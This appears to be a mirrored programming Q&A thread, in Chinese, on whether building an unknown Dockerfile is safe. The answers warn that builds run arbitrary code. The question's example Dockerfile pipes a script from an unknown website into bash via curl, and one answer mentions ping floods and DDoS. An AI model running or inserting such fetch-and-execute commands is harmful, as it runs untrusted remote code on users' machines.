代码之家  ›  专栏  ›  技术社区  ›  ynn

构建未知的Dockerfile安全吗?

security docker
  •  0
  • ynn  · 技术社区  · 5 年前

    说你有一个未知的 Dockerfile 其中有一行或多行你不太理解。

    例子: 

    FROM ubuntu
RUN curl --silent "https://some-unknown-website.io" | bash

    问题:

    1. 建造这个安全吗 Dockerfile ?

    2. 如果是这样,运行构建的映像是否安全?

    我相信即使是建筑也不安全,但今天互联网上的一位用户回复了我

    自从 Dockerfile 是一个纯文本,你可以阅读它,它实际上并不是未知的(因此是安全的)。

    虽然我认为这是一个基本问题,但像“构建未知的dockerfile是否安全”或“构建第三方dockerfile是安全的”这样的谷歌搜索并没有好的结果。所以我在这里发帖。

    2 回复  |  直到 5 年前
        1
  •  2
  •   atline    5 年前

    这取决于你怎么想 safe .

    就你的情况而言,如果 "https://some-unknown-website.io" 是一个bash脚本,其内容例如是 ping 10.192.244.226 .

    然后,上面的dockerfile可能与下一个相同: 

    FROM debian:10
RUN ping 10.192.244.226

    当你构建它时,它会永远ping你网络中的一台本地机器,那么,如果它不是呢 ping ,只是一些 ddos attack ?

        2
  •  1
  •   Nico Haase    5 年前

    那么,“安全”吗?不可以。因为Dockerfile可以像系统上的所有文件夹一样挂载,并运行这些文件夹上可用的每个脚本和程序,所以它是不安全的。在构建容器时,您已经运行了可能造成伤害的任意脚本。

    推荐文章
    MaSc. H.  ·  大小与阵列大小
    5 月前
    David 54321  ·  我的密码在pyinstaller.exe中安全吗?
    10 月前
    Duong Duc Nguyen  ·  如何检测Windows应用程序(.exe)是否正在向外部发送数据?
    11 月前
    Michael  ·  某些Windows客户端上的命名管道安全问题
    1 年前
    al ice  ·  具有颤振的鲁棒认证
    1 年前
    adamency  ·  是否可以从Go二进制文件的源代码中检索字符串?
    1 年前
    Tricotou  ·  $.get(code_url)执行返回的代码,不使用eval(),也不将其附加到DOM。jQuery安全性失败?
    1 年前
    AlboSimo  ·  PayPal Api密钥安全
    1 年前
    Jordan Regan  ·  仅在响应中保护HTTP cookie,但不保护请求
    1 年前
    kellerkindt  ·  不带查询字符串的Apache2 ProxyPass
    1 年前
    关于   移动版
    代码之家 - 一站式码农服务社区
    沪ICP备11025650号